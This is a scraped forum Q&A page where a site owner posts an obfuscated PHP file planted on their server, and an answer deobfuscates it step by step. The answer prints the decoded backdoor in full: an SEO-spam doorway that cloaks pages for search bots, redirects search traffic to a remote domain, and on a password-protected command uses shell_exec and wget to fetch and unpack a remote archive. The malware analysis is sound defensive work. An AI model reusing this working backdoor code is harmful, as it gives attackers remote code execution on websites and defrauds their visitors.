xss - astronautic-benchmark.php" virus script

Question

Welcome To Ask or Share your Answers For Others

xss - astronautic-benchmark.php" virus script

posted Oct 24, 2021 in Technique[技术] by 深蓝 (71.8m points)

xss - astronautic-benchmark.php" virus script

have anyone heard about this:

astronautic-benchmark.php script was uploaded to my web site and did something there. I am curious what they did since they were not very malicious hackers and only changed my .htaccess file, beside for planting the above mentioned file. Below is the code, someone know what it does????

<?php $wzkaou="x63"."x72"."x65"."x61"."x74"."e".chr(95).chr(102)."x75"."x6e"."x63"."x74"."x69"."o"."n";$osyifa = $wzkaou('$a',strrev(';)a$(lave')); $osyifa(strrev(';))"==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"(edoced_46esab(lave'));?>

See Question&Answers more detail:os

与恶龙缠斗过久,自身亦成为恶龙；凝视深渊过久,深渊将回以凝视…

1 Reply

深蓝 · Answer 1 · 2021-10-23T19:39:46+0000

The first line we have:

$wzkaou="x63"."x72"."x65"."x61"."x74"."e".chr(95).chr(102)."x75"."x6e"."x63"."x74"."x69"."o"."n";

So we can figure out what this does here:

echo $wzkaou; // outputs create_function

The next line we have:

$osyifa = $wzkaou('$a',strrev(';)a$(lave'));

Since we know that $wzkaou is 'create_function', this is the function being called here. The first parameter is '$a' and the second parameter is:

echo strrev(';)a$(lave'); // eval($a);

So basically we are executing:

create_function('$a', 'eval($a)');

The argument that gets passed to this function can likewise be determined like this:

echo strrev(';))"==gCN0XCJoQD9lQCJo[...]dp1Was9VZtlGdfRXZzpQD"(edoced_46esab(lave');

And this outputs:

eval(base64_decode("DQpzZXRfdGltZ[...]JCQl9DQoJCX0NCg=="));

Finally, when we base64_decode() this, it produces:

set_time_limit(0);

function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
        $ch = curl_init ();
        curl_setopt ($ch, CURLOPT_URL,$url);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
        $result = curl_exec ($ch);
        curl_close($ch);
        return $result;
}

        $doorcontent="";
        $x=@$_POST["pppp_check"];
        $md5pass="e5e4570182820af0a183ce1520afe43b";

        $host=@$_SERVER["HTTP_HOST"];
        $uri=@$_SERVER["REQUEST_URI"];
        $host=str_replace("www.","",$host);
        $md5host=md5($host);
        $urx=$host.$uri;
        $md5urx=md5($urx);

        if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();} else {$tmppath = (dirname(__FILE__));}

        $cdir=$tmppath."/.".$md5host."/";



        $domain=base64_decode("ay1maXNoLWthLnJ1");

        if ($x!=""){
            $p=md5(base64_decode(@$_POST["p"]));
            if ($p!=$md5pass)return;

            if (($x=="2")||($x=="4")){
                echo "###UPDATING_FILES###
";
                if ($x=="2"){
                    $cmd="cd $tmppath; rm -rf .$md5host";
                    echo shell_exec($cmd);
                }
                $cmd="cd $tmppath; wget http://$domain/outp/wp/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
                echo shell_exec($cmd);
                exit;
            }
            if ($x=="3"){
                echo "###WORKED###
";exit;
            }
        }else{
            $curx=$cdir.$md5urx;
            if (@file_exists($curx)){
                @list($IDpack,$mk,$doorcontent)=@explode("|||",@base64_decode(@file_get_contents($curx)));
                $bot=0;
                $se=0;
                $mobile=0;
                if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
                if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
                if (preg_match("#google|bing.com|msn.com|ask.com|aol.com|altavista|search|yahoo|conduit.com|charter.net|wow.com|mywebsearch.com|handycafe.com|babylon.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
                if ($bot) {echo $doorcontent;exit;}
                if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk=".rawurlencode($mk)."&d=".$md5host."&u=".$md5urx."&addr=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;}

                header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
                echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "
";
                echo '<html><head>' . "
";
                echo '<title>404 Not Found</title>' . "
";
                echo '</head><body>' . "
";
                echo '<h1>Not Found</h1>' . "
";
                echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "
";
                echo '<hr>' . "
";
                echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "
";
                echo '</body></html>';
                exit;
            }else{
                $crurl="http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
                echo get_page_by_curl($crurl);
            }
        }

Categories

xss - astronautic-benchmark.php" virus script

xss - astronautic-benchmark.php" virus script

Please log in or register to add a comment.

Please log in or register to reply this article.

1 Reply

Please log in or register to add a comment.

Just Browsing Browsing

Most popular tags